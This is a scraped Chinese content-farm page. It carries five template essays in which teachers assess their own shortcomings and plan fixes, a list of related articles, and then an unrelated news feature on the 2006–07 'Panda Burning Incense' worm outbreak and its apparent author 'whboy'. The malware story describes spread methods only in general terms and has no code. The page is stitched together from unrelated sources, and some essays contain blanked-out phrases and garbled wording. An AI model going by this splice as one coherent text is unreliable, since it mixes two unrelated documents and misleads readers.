投稿
  1. 首页
  2. 服务器

教学工作存在不足与改进措施总结

无崖子 2023-5-7 服务器 阅读 3

教学工作存在不足与改进措施总结,第1张

教师自查是提高教学工作质量的重要 渠道 ,能够更好的服务学生们,做好自己分内的工作那么一篇好的 总结 反思 是怎样的呢,下面是我为大家分享的教学工作存在不足与改进 措施 总结,希望能帮助到大家!

教学工作存在不足与改进措施总结1

本人通过第一阶段师德师风 教育 学习,我对师德师风集中教育活动的认识有了很大的提高,政治信念更加坚定,工作的热情更高了,干劲更足了。按照教育局关于师德师风集中教育活动第二阶段的要求,我认真“回头看”,认真进行讨论查摆,深刻剖析自己,现将自查情况汇报如下:

一、在个人修养方面:

1、有时候控制不了自己的情绪,容易发脾气,显得很不冷静,这样对工作造成了一定的影响。

2、对终身学习还认识不够,只停留在学习的表面,认为自己学懂啦,不再深入。这样,在工作教学中,存在有时感到所学的知识还不够用,没有较好的写作能力,在教育这片领域里要创造一片属于自己的蓝天需要付出更多的艰辛。

3、满足于过得去的工作作风,对政治理论学习、政策、教育法规政策了解和掌握的程度、重视的程度还不够高。

二、在教育教学方面:

1、 教学 方法 创新不够,课堂效率有待于进一步提高。

2、坚持做到不体罚或变相体罚学生。在与家长的交往中不收礼、不吃请、不叫家长办事,不进行有偿家教。

3、没有真正深入学生中间去了解学生(特别是差生),

整改措施

找准问题,剖析原因,努力做到自查自纠,在今后的工作中要克服这些缺点,以“”重要思想为指导,努力加强自身师德师风建设,在思想上树立为教学奉献的精神,在行动上树立倾心教学的典范。

1、切实加强政治理论学习,尤其是马列主义、、和“”重要思想,扎实提高实践“”重要思想的本领,结合先进性教育活动,增强党性锻炼的自觉性,进一步明确前进的方向。争取坚持每天看党报、党刊、或电视新闻,适当记录要点,以提高自己的政治素质。

2、加强业务知识学习,增强终身学习的意识,努力提高综合素质。首先从实践中学,同时勤于从书上学,学习自己主管工作的专业知识,提高写作能力,提高管理水平。学习教育教学理论,业精于勤,才使人信服。其次向挫折和教训学,不断加以改进和提高,以致完善自我,丰富人生。尽可能多地挤出时间深入课堂检查督促指导教学工作。

3、坚持理想信念,坚定建设中国特色社会主义的信心;坚持党的根本宗旨,始终不渝地做到立党为公、执政为民;坚持勤奋工作,兢兢业业地创造一流的工作业绩;坚持遵守党的纪律,身体力行地维护党的团结统一;坚持“两个务必”,永葆人的政治本色。

4、树立正确的世界观、人生观、价值观,不计名利,勤于工作,恪尽职守,把毕生精力无私地奉献给党和人民的教育事业。

5、在教育教学过程中,利用学科特点加强对学生的思想教育,提高他们的思想政治素质,激发他们的学习积极性,努力提高教育教学质量。努力做好后进生的转变工作。

6、不断丰富自身学识,努力提高自身能力、业务水平,严格执行师德规范,增强事业心、责任感, 爱岗敬业 。坚持“一切为了学生,为了学生的一切”,树立正确的人才观,重视对每个学生的全面素质和良好个性的培养,不用学习成绩作为标准来衡量学生,与每一个学生建立平等、和谐、融洽、相互尊重的关系,关心每一个学生,尊重每一个学生的人格,努力发现和开发每一个学生的潜在优秀品质。

教学工作存在不足与改进措施总结2

学高为师,身正为范——这八个字是师范 毕业 时班主任给我的赠言。从教十余年,我时时对照这八字警言,反省自己的言行。在这句话的鞭策中,我愈来愈深刻的认识到:教师不仅仅是一种职业,更是一种事业,一种责任!俗话说:前事不忘,后事之师。作为一名党员教师,更应积极投入,抓住契机,深刻反思自己的师德言行、工作作风和生活态度,谦虚听取各方面的意见和建议,为今后的工作、学习与生活调整好新的奋斗目标。

自身主要存在问题有:

1、理论学习较松懈。

主要原因是:思想认识不深。认为,马克思主义等重要思想理论性太强,是我们党的高层决策者把握发展方向的指南针。而我们只是工作在最基层、一线的党员,似乎理论不太沾得上边,只要专心工作,不犯原则性错误就行了,学不学都是无所谓的。再则,正因为理论性太强,字字精辟,学起来觉得枯燥、太累了,反正也无人监督,不如敷衍了事。

现在我深刻认识到,这种思想实在要不得。理论联系实际,是党一贯坚持的马克思主义学风,是党具有旺盛创造力的关键所在。在实际工作中,只有加强理论学习,才能从更高层面的指导和开展工作,增强工作的原则性、系统性、预见性和创造性;在实际生活中,只有在熟练掌握和运用党的政治理论知识,才能面临丰繁复杂的社会环境,不易受各种思潮的影响,更加坚定党的信念,牢固的树立正确的世界观、人生观和价值观。

2、创新意识有待提高:工作中只知按规定,按部就班去做,缺乏工作能动性和创新意识。

3、工作作风欠踏实。

主要原因:在工作中,还存在着“偷懒”的侥幸心理。每次上兴趣课时,心里总在想,反正就这点水平,凑和着算了;有的活动开展纯粹是应付性的。而作为一名学科教师,在一些教学常规的执行方面也存在着漏洞,如容易丢三落四,课前准备不充分,影响了孩子的学习兴趣;有时在上课铃响后才赶到教室,在为人师表这一点上打了折扣。

在学习了《保持员先进性教育读本》、《我身边的员》等书后,对自己的言行感到深深地自责。原先在对待这些事时,也有过一点点的内疚,但很快便会原谅自己。现在对照那些甘愿平凡却正不断创造着不平凡的优秀党员们的优秀 事迹 ,我才真正理解了“原谅自己就是堕落的表现”这句话的含义。如果在教育教学中每次碰到类似的现象都这样应付,或不引起重视,形成一种习惯那后果是非常严重的。因为从这些事例中也看到了自身对工作的不负责任,对孩子的不负责任,对学校的不负责任,还够得上党员的资格吗又怎样来发挥作为一名党员应有的模范作用,怎样让群众心服口服呢

下一步的整改措施:

1、要善学。

积极参与政治学习,认真作好学习笔记。学习与时俱进的马克思主义理论、

重要思想;学习新时期教师道德规范和要求,提高自觉性;学习优秀党员的先进事迹和 经验 ,升华自己的师德境界;更要学习教科研理论和丰富的专业知识,及时转变理论观念,真正做到以生为本,教学相长。

2、要牢记宗旨,使工作有更大提高。

3、要严己。

在工作中严于解剖自己,认真进行自我批评,通过不断的反思来促进自身的成长。在工作中要强化精品意识,要么不做要做就要尽的努力。俗话说,十年树木,百年树人。对人的教育是长期的、复杂的,要不断提高自身的责任感,不能有“混“的思想,以”精“来严格要求自己,积极作好防微杜渐的工作。

教学工作存在不足与改进措施总结3

目前,一场师德师风整治的大幕正在我校轰轰烈烈地展开。学校通过对我校教职工作风的大整顿,使全校教职员工爱岗敬业意识增强,组织纪律更加严明,教育教学质量得到进一步提高,使学校各项工作更上一个新台阶。作为一名教师,在作风整顿中就要认真反思自已在思想上,工作态度等方面存在的突出的问题,我主要从以下几方面来自查自纠,对照检查。

一、组织纪律方面

作为一名是学生学习的榜样,就必须保证自己在学生心目中的形象,那就务必有严格的组织纪律来约束自己,即“身正为范”。根据这些法规法纪,我有变相体罚学生的现象:比如对没完成作业或未交作业的学生罚扫地,对听课不认真的学生罚站……从这些现象可以根据出我对教师法规法纪的认识、理解还不深透,在整风过程中,应严格反省批评自己。

二、教育教学方面

教育教学地评价一名教师的确良重要准则。教师的职责是教书育人。学生在学校是受教育的对象,教育质量的好坏是学生和家长来评定,而家长的评价的标准是看学生考试成绩的分数。我认为自己的教学效果不太理想。在本职工作之余,还应向优秀教师取经。多用时间与精力,努力提高自己的教学水平。

综上所述,在本次整风运动中,我应从各个方面,各个层次深刻反省,找出自己的不足之处,查其根源,对症下药,以提高自身素质,让自己与“身正为范,学高为师”的标准靠齐,明确今后的整改方向,以便更好地开展工作。

一、存在的主要问题:

1、思想意识不够强。

不善于培养自己从政治的角度来观察、分析问题,认识事物只停留在表面,未看本质,对事物的理解不深刻、不全面。在思想上未引起高度的重视,学习目的不够明确,学习时缺乏思考,只从字面上理解,没有意识其思想的精髓,没有发挥理论的指导作用,只是为了学习而学习,使学习变得形式化、教条化。

2、宗旨观念不够牢固。

我有时对待学生和自己的同事不能始终保持热情的态度,尤其当手头工作稍多,稍忙时,存有“事不关己,高高挂起”的思想,以至自己为学生服务、为同事服务的公仆意识淡化,没切实做到为群众所想,为群众所急。总觉得自己是一个基层的老师也干不了什么大事,没有深刻理解“全心全意为人民服务”的宗旨,以至于为群众服务意识的淡薄,这是工作中缺乏耐心的根本原因。“一切为了群众”是要求我们真正做到全心全意为人民服务,拿出的热情对待每一个学生,每一位同事,做到树立党员一面旗的良好形象。

经过学习,我深深地体会到“爱岗、敬业、奉献”的内在含义,也认识到自己的不足。“人无完人,金无足赤”。从职业道德范畴来看,良好的师德师风对每一个教师都是一个永恒的要求,也是我所追求的目标。

教学工作存在不足与改进措施总结4

为进一步贯彻落实《福建省小学教学常规管理若干意见(试行)》,根据洛江区教育局《关于开展全区小学教学常规工作检查的通知》(泉洛教初[__]33号)通知精神,我们抽调各基层小学教导主任协同中心小学领导、教研人员等组成两个评估组,于__年11月2日至3日对全镇小学教学常规工作进行专项检查评估,关于罗溪镇小学教学常规工作的自查 报告 。通过随堂听课、查阅材料、实地考察、个别交流、小组评议等形式进行检查评估,进一步规范我镇小学教学常规工作管理,强化教学管理意识和教学质量意识,推进学校教育科研工作,推动教学改革的深入开展,全面提高教学教研质量。

一、主要成绩:

(一)学校管理工作常规

重视课程计划管理。各小学做到严格按省颁课程计划开齐课程、开足课时,积极创造条件落实课程计划,落实教材和教师,并能组织教师学习研究和执行课程计划及课程标准,力求在课程开设上保证学生全面发展不偏向。敬德中心小学是这方面的典型,一直坚持严格执行省颁课程计划,其他一类区和建兴小学相对来说也较规范。

严格教学环节管理。①落实要求。在学校教学管理制度中,对教与学的各个环节(计划、备课、上课、辅导、作业批改、考试考核)都作明确的要求。②加强检查。各校重视对教学环节的检查和指导,采取定期或不定期、普检或抽查等形式,检查教师备课教案和学生作批改情况;学校领导经常深入课堂听课,教师听课节数达到要求。

养成教育与“三风”建设有成效。各校能重视养成教育与“三风”建设,有日常规范评比细则,坚持每日评比,周小结,学期表彰。升国旗制度健全, 国旗下讲话 材料归档完整。

规范资料档案管理。各校都能重视档案管理。学籍档案设置齐全,有专人管理。重视把教学教研资料作为学校常规管理资料的重要组成部分,设立有专门的资料柜,分类建档工作较为规范。敬德中心小学还建立了资料索引目录,便于教学教研资料的归类存档和查找,取得良好成效。

后勤管理规范。各校环境卫生整洁,各室设置规范,器材排列有序。学校财产登记造册,大部分专用教室使用率高,有使用记录。

(二)教科研工作常规

教研氛围渐为浓厚。绝大部分的基层学校都能根据《洛江区小学校本教研工作指导意见(试行)》,结合自己实际,制订可 *** 作性强、各具特色的校本教研制度。每学期初认真制订教研 工作计划 ,认真组织实施常规的教研活动;各校还能认真贯彻落实《关于开展洛江区小学校本教研专题系列活动的通知》精神,切实有效地开展促进教师专业成长的活动。敬德中心小学认真抓好区级立项课题的研究工作,即将接受结题验收;敬德、世壁、翁山、建兴还各有一个课题也正争取区级立项研究。各校还能认真落实《洛江区小学校本课程开发与管理指导意见(试行稿)》,积极探索课程改革背景下校本课程开发与管理的途径,着手进行校本课程开发,特别是奕聪小学能发挥教师特长,开发并实施了“南音教学”这一校本课程,取得良好成效。

活动开展渐趋正常。各学校都能以教研组为载体,组织教师定期或不定期开展听课、评课、议课活动,举行公开课、研讨课等活动,一类区5所学校教研活动形式相对来说较为丰富,既有听课评课、读书活动、经验交流,也有录像课的观摩研讨,还有针对某些教学实际问题的探讨和研究等。

评价机制初步形成。各校都能积极探索对师生发展的评价,评价机制初步形成。建立教师成长记录档案,学生成长记录袋,对学生的评价采取等级加鼓励性评语加特长进行多元评价。

(三)教师教学工作常规

计划制订。各学校的教师对计划的制订基本养成了一种习惯,开学前或第一周就拟订好学科教学计划,大部分的教学计划具备了规定的项目,措施也较为具体,有效规范了教学计划的拟订与撰写。

课前备课。检查中发现,大部份教师都能做到提前备课,并有一周以上的储备课。教师对备课工作都非常认真,教案写得比较详细,具有较强的可 *** 作性,备课项目相对来说也较全,课时数较足。大部分教师逐步重视教学反思,能按要求认真进行,不仅中青年教师写教后记,老教师也能认真撰写,对进行教学反思的重要性,大部分教师逐步形成了一种共识。

课堂教学。这次评估虽未深入课堂听课,但从巡视、检查教师教案及平时的听课检查中可以看到,很多教师在新理念指导下,在课改春风吹拂下,不断学习、模仿和尝试新的教学方法、教学模式,给传统的课堂教学注入了一些新鲜血液,也逐步打破了传统课堂教学的一些桎梏,推动着课改前进的步伐。

作业批改。很多教师能根据年段要求、学科特点和学生实际,设计课堂作业;绝大多数教师作业批改及时,有的还采取等级加鼓励性评语,并做好批改后的反馈和补救; 作文 批改注重面批面改。柏山小学语文教师对作业的设置和批改都比较有特色,是本次评估发现做得的一所学校。

课业辅导。很多教师都重视培优扶弱工作,做到计划、对象、时间、措施落实,并把主阵地落实在课堂,切实加强个别性指导。大多数学校在差生转化方面一直都较为重视,辅导差生工作到位,效果也较好,培优扶弱工作得到了有效的加强。

考试考核。各校教师都能认真做好平时的单元检测,形成良好的习惯。同时,各校教师都能自觉地严格遵守期中、期末考试及评卷的有关规定,近几年的期末检测和评卷都没有出现明显的作弊行为。老师对试卷的评改较为认真,有批也有改,重视语言激励,个别老师连部分考试作文都附上了批语。对考试、检测后的简单质量分析,各校教师都能重视,不仅期中、期末试有较为详细的试卷质量分析,成文备案,平时的单元检测后的质量分析也逐步引起了重视。

二、存在问题:

1、 规章制度 仍需进一步完善和落实。①相当部分学校的校本教研制度还需进一步完善。各校虽能积极探索对师生发展的评价,评价机制初步形成。但还很不成熟,可 *** 作性不强。②有些学校的规章制度未结合本校实际,只是草草订出来或是从别的学校复制一份过来应付检查;③部分学校领导忙于事务,检查督促不到位,一些制度没有严格执行,制度形同虚设。

2、教师校本业务培训工作有待加强。①一些学校业务学习无目的、无计划,随意性大,次数不足,记录也不规范,有个别赶造充数的现象;②有不少学校未能认真结合本校实际,组织学习有针对性的业务理论;③教师专业成长记录未能做到持之以恒,流于形式,且参差不齐。

3、教研科研活动针对性、实效性不强。①相当部分学校的教研活动仍停留在听课、评课等常规活动上,且大多局限于语文、数学,其他学科的教育教学研究活动很少或根本没有开展;②教研活动未能结合学校实际定出研究专题,未能抓住本校教学中存在的主要问题和薄弱环节来进行研究;③少数学校领导忙于事务,组织开展教研活动少,部分教师参与积极性不高,有些教师甚至把教研活动时间用来拉家常、谈时事等。

4、部分教师落实教学常规工作不到位。主要表现在:①教学计划和备课方面。部分教师教学计划不规范,备课教案项目不全,课时数不足,有偷工减料行为;教案基本步骤不明晰,重知识罗列,轻教法设计和学法指导;以抄代备的现象仍然普遍存在;体育、音乐、美术、自然、思品、社会等综合科目的计划、备课教案较少,或是编写过于简单;有部分教师把写教后记看作是一种负担,敷洐了事;②课堂教学方面。一是有些教师教学行为不很规范,不坚持用普通话上课,坐着上课,个别教师教育学生欠耐心,有讽刺、挖苦学生现象;二是部分教师不思改革,课堂教学方法、模式陈旧,教学效率低;③作业布置与批改方面。部分教师的作业设计流于形式;有的教师批改作业粗枝大叶,批语过于成人化、公式化、雷同化,没有针对性和鼓励性;有部分教师对作业错漏的补救不到位;④课业辅导方面。部分教师培优扶弱工作计划不周,措施不力,方法不灵,差生面大。

5、资料积累和建档工作仍要进一步加强。①个别学校不重视平时资料的积累,教学、教研方面的资料欠缺较多,为应付检查,生造、补写档案资料;②个别学校未设立有专门的资料柜,资料的收集、整理和分类建档工作不够规范。

三、努力方向:

1、加强学习培训,提升教学意识。一是加强业务理论学习。要抓好业务学习,立足校本培训,积极探索校本培训的途径和方法。认真组织教师学习《基础教育改革纲要》(试行),学习新课程标准理念,领会课改精神,了解学科改革的新信息、新理论、新成果。向教师推荐课改方面论著,要求每位教师每学期读1本教育专著,并做好 读书笔记 5000字以上,以进一步提高业务素养。二是抓好教学反思。让教师反思自己的教学实践,反思自己的教学行为及教学效果,更新教学观念,改善教学行为,提高教学水平,使教师真正成为教学和研究的主人。要求经常对自己的读书笔记、教案、教后小记、 工作总结 等进行反思,在继承的基础上有所创新,在总结的。基础上提高。

2、严格教学常规,重视管理创新。教学常规的管理,是教学管理中一种相对稳定的管理形式,也是教学管理中最基本、最经常的管理活动。①完善教学管理制度。继续修订、完善《洛江区罗溪中心小学教学常规管理实施意见》、《洛江区罗溪中心小学教学常规管理检查评估工作实施意见》和《罗溪中心小学教育教学工作综合评估细则》。各校要结合自己学校实际,完善或重建质量指标、奖惩方案及教师德、能、勤、绩考核实施细则,努力改革教师评价制度。②狠抓教学过程管理。各校要认真抓好备课、上课、作业布置与批改、辅导、课外活动、考核等教学工作的各个环节,规范教学行为。要采取多种形式,认真加强教学常规检查,全学期普查不少于三次,每月开展一次“四查”(查备课、上课、作业批改、听课笔记)工作,检查后要及时进行反馈,并将检查结果与教师工作量化评估及奖惩挂钩。中心小学采用定期与不定期相结合的方法组织人员到基层小学进行常规检查评估。抽查的项目重在上课、备课、辅导与作业批改,抽查的形式以听课、走访学生为主。

教学工作存在不足与改进措施总结5

教育教学的常规管理是一个系统工程,需要持之以恒,从细节着手,规范各个环节,只有这样,才能取得成果。近年来我校逐步加强学校的教学常规管理工作,取得了一定的成效。

一、教学常规管理

1、我校严格按照“调整后的基础教育课程改革义务教育阶段课程设置及课时安排”的要求,开齐开足各门课程,充分考虑教师的能力、特长,适当的安排任教科目。每学期在正式上课前2天就排好新课程总表和教师分课表。并要求教师在开学一周内上交切实可行的教学计划,在计划中要详细分析学生的上学期成绩和后进生的情况,并附有后进生转化计划。

2、学校制定了《鹿木乡学校教学常规基本要求》。对备课、上课、作业批改、教学质量检测和评价做了明确的规定。要求教师备课必须对照学科课程标准,深入钻研教材,精心设计教案,从学生实际出发,既备书又备人。每学期组织2次的教学常规检查,检查由教导处组织,各教研组长参与,对检查的结果做了详细的评价,并且在检查后向每位教师做具体的反馈。

3、每学期学校组织期中、期末两次教学质量检测,考试过后,由各教研组组织对各年级各科成绩进行具体的分析,并填好成绩分析表,注明班级中存在的问题和改进的具体措施。

4、学校统一征订了各年级综合实践的相关教材,各年级制定好了学期活动计划,能定时的开展实践活动。充分利用学校的劳动基地,分批组织学生学习番薯、毛豆等常见农作物的播种技巧。

二、教科研管理

学校建立了教师专业培训制度,教师积极参加继续教育。教研制度健全,各教研组每学期开学两周内制定好教研计划,并能按照计划开展活动,活动后材料能及时归档,并能做到活动有主题、有记录。各教研组根据教研活动中发现的问题,确定相关的课题,能积极的开展教科研活动。本学期我校共有6项课题获得__市立项,基本形成人人参课题研究的良好科研氛围。《鹿木乡学校教师听评课制度》详细规定了教师听评课的相关要求,学校统一发放评课稿,听课后能做到有具体的评课记录。

三、德体卫艺管理

重视德育制度建设和德育队伍建设,建立了各类安全活动应急预案,制定了新的班主任考核制度,完善了班主任例会制度。坚持以活动为载体,将德育贯彻于活动之中,举行了给类 文化 活动节,丰富了学生的校园文化生活。同时注重对学生的心理健康教育,我校正在积极筹备建立学生心理咨询室,已选派5位教师参加心理辅导员培训。

四、档案管理

近年来学校加强教育、教学、教研档案的定期收集和管理。各科室能将活动的相关材料定期做好归档,并建立统一的归档方案,附有档案目录。学校要求每班都要建立学生成长记录册,由班主任具体负责,每学期期末进行成长档案归挡。本学期我校还利用了学校的服务器建立了电子档案,各类活动的照片、相关材料能分类有序的上传到服务器。

五、学校特色

我校开展了丰富多彩的各类校园文化活动,近一年来我校陆续开展了“首届艺术节”、“首届科技节”、“首届体育节”“首届读书节”等活动。学生参与的积极性非常高,并且建立相关制度,保证各种活动每年能持续的开展,形成良好的校园文化氛围。

六、存在的问题

1、个别教师参与学校各类活动的积极性不高。

2、学生好没有养成良好的卫生习惯和高效的学习习惯。

3、学校制定了绩效考核制度的讨论稿,但还有待加强和完善。



教学工作存在不足与改进措施总结相关 文章 :

★ 教学工作总结最新大全(10篇)

★ 教师总结与反思9篇

★ 教师教学工作总结优秀范文

★ 教师个人教学工作总结10篇

★ 教师学期教学工作总结范本10篇

★ 2021年自查自纠个人总结10篇

★ 教师工作存在不足和整改措施

★ 教学工作存在不足与改进措施

★ 教学在不足和整改措施

★ 2022教务处期末教学工作总结

熊猫烧香病毒幕后黑手曝光 曾造2005十大病毒这是一波电脑病毒蔓延的狂潮。在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬、颔首敬香的“熊猫”除而不尽,成为人们噩梦般的记忆。
反病毒工程师们将它命名为“尼姆亚”。它还有一个更通俗的名字———“熊猫烧香”。它迅速化身数百种,不断入侵个人电脑,感染门户网站,击溃企业数据系统……它的蔓延考问着网络的公共安全,同时引发了一场虚拟世界里“道”与“魔”的较量。反病毒工程师和民间反病毒人士纷纷投身其中。
1月19日,一个最新的“熊猫烧香”变种病毒出现。病毒作者宣称,这将是“熊猫烧香”最后一次更新。
这场历时两个多月的较量结束了吗?
“蜜罐”中发现病毒
2006年11月14日,中关村瑞星公司总部14楼。
一群反病毒工程师围着一台与网络隔绝的电脑。随着鼠标点动,数百个熊猫图标出现在屏幕上。这是工程师们当天捕获的病毒,命名为“尼姆亚”。
史瑀是瑞星公司研发部病毒组的反病毒工程师。他每天的工作就是,和数十名伙伴一起捕捉网上流传的病毒,然后将病毒“拆”开,研究其内部结构后,升级瑞星的病毒库。
当天下午,一名用户向他们提交了一份病毒样本。随后,他们又在病毒组的“蜜罐”内,发现了该病毒的踪影。
“蜜罐”是病毒组设立在互联网上的一些防卫性孱弱的服务器,工程师们故意在服务器上设置多种漏洞,诱使病毒侵入。“就像猎人做的沾满蜜糖的陷阱,专门吸引猎物上钩。”
从“蜜罐”里提取病毒后,史瑀和同事们将病毒移到公司14楼的一台与网络隔离的电脑上,这里是病毒的“解剖台”。
“运行病毒之后,系统所有的图标都变成了熊猫。”史瑀眼前的屏幕上,出现了一排排的熊猫图案,熊猫们手持三炷香,合十作揖。
经过分析,工程师们发现,在病毒卡通化的外表下,隐藏着巨大的传染潜力,它的传染模式和杀伤手段,与风行一时的“威金”病毒十分相像。瑞星公司随即发布病毒预警。
病毒蔓延涌向全国
“最开始的‘尼姆亚’不算厉害。”史瑀说,随着病毒作者的不断更新,它的破坏力和传染力也随之上升。
2006年11月底,“尼姆亚”只有不到十个变种,然而12月开始,病毒作者从数日一更新,变为一日数更新,它的变种数量成倍上升。这时候,“熊猫烧香”已经取代了“尼姆亚”这个名字。
12月中旬,“熊猫烧香”进入急速变种期,在几次大面积暴发之后,“熊猫烧香”成为众多电脑用户谈之色变的词汇。
圣诞节过后,“熊猫烧香”版本已达到近百个。
史瑀说,去年12月下旬,国内近千家大型企业感染“熊猫烧香”,向瑞星求助。“当病毒变种和感染人群超过一定数量时,病毒的传播就会以几何方式增长。”
12月26日,金山毒霸全球反病毒监测中心发布“熊猫烧香”正疯狂作案的病毒预警。
27日,江民科技发布关于“熊猫烧香”的紧急病毒警报。
2007年1月7日,国家计算机病毒应急处理中心紧急预警,“通过对互联网络的监测发现,一伪装成‘熊猫烧香’图案的蠕虫病毒传播,已有很多企业局域网遭受该蠕虫的感染。”
1月9日,“熊猫烧香”继续蔓延,开始向全国范围的电脑用户涌去。
这一天,“熊猫烧香”迎来了一次全国性的大规模暴发,它的的变种数量定格在306个。
各地用户纷纷中招
小江是黑龙江省一家网吧的网管。1月9日到1月10日的两天间,他所在的网吧内空空荡荡,并无顾客,打开网吧的40多台电脑,屏幕上布满了“熊猫烧香”图标,系统崩溃,无法运行。
“毒是9日早晨中的,一开始只是一台机器,我杀毒时候,局域网内其他机器陆续中招。”小江说。
同一天早晨,在北京一家IT公司工作的刘先生上班后发现,公司近30台电脑全部感染“熊猫烧香”,病毒破坏了电脑内的程序文件,并删除了电脑备份,公司正在研发中的半成品软件毁于一旦。
刘先生愤怒之下却又无奈。在年度总结报告中,他特意加上了一条:“以后重要程序必须备份,防范类似‘熊猫烧香’的流氓病毒。”
同一天晚上,北京的一家报社里,技术人员们东奔西跑,几十名编辑记者都在等待着他们清除电脑里的“熊猫烧香”。
1月10日,上海一家台资公司的员工张先生打开电脑,迎接他的是一排排拱手举香的熊猫。环顾四周,他发现同事们脸上有同样的惊诧表情。整整一天,公司业务陷于瘫痪。
……
根据瑞星公司提供的“熊猫烧香”病毒用户求助数据,仅1月9日一天,瑞星用户向公司求助的人数已达1016人次,11日达到1002人次。因为是选择性求助,并仅限于瑞星杀毒软件的正版用户,这个数据只是冰山一角。
据了解,1月9日感染的电脑用户达数十万。其中北京、上海等电脑用户较集中的城市成为“重灾区”。
“熊猫”并未就此止步,它继续四处“烧香”。随着变种的不断增多,病毒洪潮蔓延无休,并且愈演愈烈。
截至目前,“熊猫烧香”病毒变种已达416个,受感染电脑用户达到数百万台。
1月22日,国家计算机病毒应急处理中心再次发出警报,在全国范围内通缉“熊猫烧香”。
门户网站遭遇感染
1月24日,北京市政府信息工作办公室在官方网站上设立了“熊猫烧香”病毒专题,其中撰文称:“一种伪装成‘熊猫烧香’图案的病毒正在疯狂作案……目前已有多家企业局域网和网站遭受重创,多数网民也深受其害。”
“熊猫烧香”因何难退?
“‘熊猫烧香’和以往的病毒不同,它采用了一种新的传播手段。”史瑀说,传统的蠕虫病毒是通过一台中毒电脑传至局域网内其他电脑,而“熊猫烧香”在整合了所有可利用的传播漏洞之外,还可以通过网站传播。
感染“熊猫烧香”的电脑,会在硬盘的所有网页文件上附加病毒。“如果被感染的是网站编辑和记者的电脑,那么通过中毒的网页,‘熊猫烧香’就可能附身在网站的所有网页上。”史瑀说,访问这种中毒的网站时,网民就会感染“熊猫烧香”病毒。
从传统的点对点,到现在的点对面,“熊猫烧香”借助中毒网站的惊人访问量急速传播。
据反病毒工程师称,他们曾监控到,“熊猫烧香”感染过天涯社区、硅谷动力、pconline等门户网站,在暴风影音等知名软件的下载链接中也曾有“熊猫烧香”附身的痕迹。同时,“熊猫烧香”还可借助搜索引擎进行病毒传播。
“借助局域网天女散花,借助门户网站星火燎原,借助U盘死灰复燃。”史瑀说,“熊猫烧香”的三项主要传播方式,成为病毒难以退去的主要原因。
反毒人士抗击病毒
史瑀说,自去年圣诞节之后,瑞星公司病毒组就开始不断加班,每当“熊猫烧香”发布新变种,工程师们就立即采集样本,解剖病毒,并升级相应的专杀工具。“这段时间里,通宵熬夜就有4次。”
“‘熊猫烧香’技术谈不上高超,主要依赖于作者不断疯狂地更新,它更新,我们就随之更新专杀工具。”史瑀说,“熊猫烧香”善于利用新漏洞,比如1月8日的变种就利用了QQ一项最新的安全漏洞。
“熊猫烧香”诞生至今,病毒版本修改了400余次,史瑀和同事们开发的专杀工具也升级了10余次。
除杀毒软件公司外,散布在网民中的“反毒高手”在抗击“熊猫烧香”中同样发挥了重要作用。
在卡卡网络社区的反病毒论坛上,云集着不少电脑高手,他们大都是业余编程爱好者,时常一起研究杀毒技术。“熊猫烧香”刚现身,就引起了他们的注意。
2006年10月底,在瑞星公司尚未捕获“熊猫烧香”病毒时,程序高手“农夫”就已经拿到了当时的“熊猫烧香”病毒样本,并编写了专杀工具。此后,每当“熊猫烧香”发布变种时,反病毒论坛的网友mopery和艾玛等人,就会写一份详细的变种分析报告,指出病毒的危险性和新特性。
“其实民间的杀毒高手很多。”史瑀说,他自己以前就是一名民间高手,高中时代起就爱好研究病毒,大学毕业后被杀毒软件公司招募。所以,他现在经常会浏览一些著名技术论坛,如果民间高手有一些好的想法,病毒组也会借鉴。
史瑀说,他手头掌握着一张“底牌”———“未知病毒查杀”。他说,这种杀毒办法可以判断病毒的“家族特征”,只要变种符合一系列特征,专杀工具就能有效查杀。
史瑀介绍了这种新专杀工具的工作原理,但他要求记者报道时隐藏该项内容,“让病毒作者知道了就麻烦了,这是我们取胜的杀手锏。”
一场未结束的战争
1月19日,“熊猫烧香”发布了一个新的变种,病毒作者同时宣称,这将是“熊猫烧香”最后一次更新。
消息传来,在卡卡社区上,饱受“熊猫烧香”折磨的网民们一片雀跃。高兴之余,他们开始反思得失。
在反病毒论坛上,网友tom2000发表了一篇名为《熊猫启示录———风波过后的反思》帖子,文中称:“以后有多少新的病毒/木马会借鉴熊猫的经验呢?一切才刚刚开始!”
业内专家认为,中国的互联网处于起步初期,大部分网民缺乏最基本的网络安全防范知识,也缺少良好的上网习惯。安全意识的薄弱,给病毒大面积传播带来可乘之机。同时,随着计算机在各个行业的普及,病毒造成的损害也将越来越严重。
1月24日下午,反病毒工程师们又发现了一种新型病毒,这种病毒和“熊猫烧香”十分相似,工程师怀疑它是“熊猫烧香”作者创作的新版本病毒。
这种病毒会把受感染用户电脑上的所有图标换成一个男子的头像,在头像的眼睛位置是两个电灯泡。
反病毒工程师们担心的是,“灯泡男子”会不会成为“熊猫烧香”的接班人。
“这是一场看不见硝烟的战争,对我们而言,战争还在继续。”史瑀说。
谁制造了“熊猫烧香”?他意欲何为?在“熊猫烧香”肆虐期间,关于作者身份的种种猜测流传于互联网上。在百度“熊猫烧香”贴吧中,数百名深受“熊猫”所害的网民发帖“通缉”病毒制造者,更有网民声称开出10万美元的悬赏花红。
昨天,反病毒工程师向记者透露,“熊猫烧香”的作者并非无迹可寻,在解剖病毒过程中,他们发现了留在病毒内的一些神秘留言。在这些留言里,“熊猫烧香”的作者自称whboy———“武汉男孩”。
“熊猫”体内暗藏留言
mopery是卡卡社区反病毒论坛的版主,也是一名反病毒高手。
2006年10月中旬,mopery接到网友求助。在帮忙解决电脑故障的过程中,他拿到了一个病毒样本,它就是“熊猫烧香”的原始版本。
将病毒“解剖”之后,在繁复的程序代码中,mopery看到了一段与程序无关的信息,其中有一行字母:“whboy”。
“whboy”这个名字,对于病毒研究者有着不一般的含义。2004年,whboy即发布了其创作的病毒“武汉男孩”,那是一种通过QQ传播的盗号木马,因为其变种的疯狂和传播的广泛,一年后,被江民反病毒中心列入2005年十大病毒之列。
此后,whboy还在一些病毒论坛和黑客论坛发帖,表示可以提供QQ号服务,但不久后便销声匿迹,直至“熊猫”出现。
mopery对“熊猫烧香”进行了认真分析。他发现,这种病毒并不拥有最厉害的技术,却拥有最成熟的传播手段。
mopery对“熊猫烧香”产生了浓厚的兴趣,他联系了另一名民间反病毒高手农夫,在2006年10月25日推出了第一款专杀工具:尼姆亚蠕虫专杀。
“第一只熊猫没什么威力,厉害的是后面的变种。”mopery说,从发现第一版“熊猫烧香”后,一个月内,它的变种就达到了十几种。
